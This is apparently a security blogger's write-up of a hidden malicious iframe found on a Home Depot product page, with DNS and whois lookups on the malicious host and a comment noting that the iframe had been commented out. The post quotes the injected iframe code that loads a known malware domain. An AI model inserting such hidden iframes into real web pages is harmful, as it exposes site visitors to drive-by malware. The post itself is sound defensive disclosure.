Home Depot Website Hack

It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website.  It all started with a simple Google search for “home depot stair spindles”.

The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.

As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.

As can be seen in the screenshot, the below code has been injected into the page:

<iframe src=”hxxp://vwui.in:8080/index.php” width=170 height=185 style=”visibility: hidden”></iframe>

The site vwui.in is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://vwui.in/

http://stopbadware.org/reports/90331f78dc600d02b5c6f6e77f807915

After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting.  As it turns out, this domain no longer resolves.

[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)

StopBadWare lists the IP associated with this domain as 209.85.51.176 which according to the whois database belongs to ThePlanet.com Internet Services.

[prompt ~]$ whois 209.85.51.176
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 – 209.85.51.255
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 – 209.85.127.255

Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.

So how did this page on Home Depot’s website get compromised?  While it’s not possible for me to know for certain without doing an complete investigation, I can make an educated guess.  Typically, these types of attacks use one of several attack vectors:

  • Compromised FTP credentials due to a weak password
  • Brute force compromise of server credentials
  • SQL injection

Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites.  In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe.  They also tended to host their malware on port 8080 rather than the standard port 80.  Given the fact that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and the fact that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and only now has been discovered.  While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present which could lead to a future compromise of this site.  I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.

2 Responses to “Home Depot Website Hack”

  1. Mark Baldwin says:

    I would like to thank Scott Frost and Steve Bush for pointing out that the malicious iframe I discovered on the Home Depot web site had been commented out. This was an oversight on my part and was not left out of the article intentionally. Nevertheless, the point of my story is the same. At some time in the past this page was injected with an iframe that linked to a malicious web site. It is reasonable to assume that this code was active and likely did result in the infection of some Home Depot site visitors’ PCs. This iframe must have been detected by Home Depot at some point and the developer decided to comment out the iframe rather than delete it. The malicious site in question was also taken down at some point. It is worth noting that my AV software still detected the commented iframe (nice job Avast) which is what led me to the discovery.

Trackbacks/Pingbacks

  1. Tweets that mention Home Depot Website Hack | InfoSecStuff -- Topsy.com - [...] This post was mentioned on Twitter by Mark Baldwin. Mark Baldwin said: Home Depot Website Hack http://goo.gl/fb/bP5aX [...]

Leave a Reply

Your email address will not be published. Required fields are marked *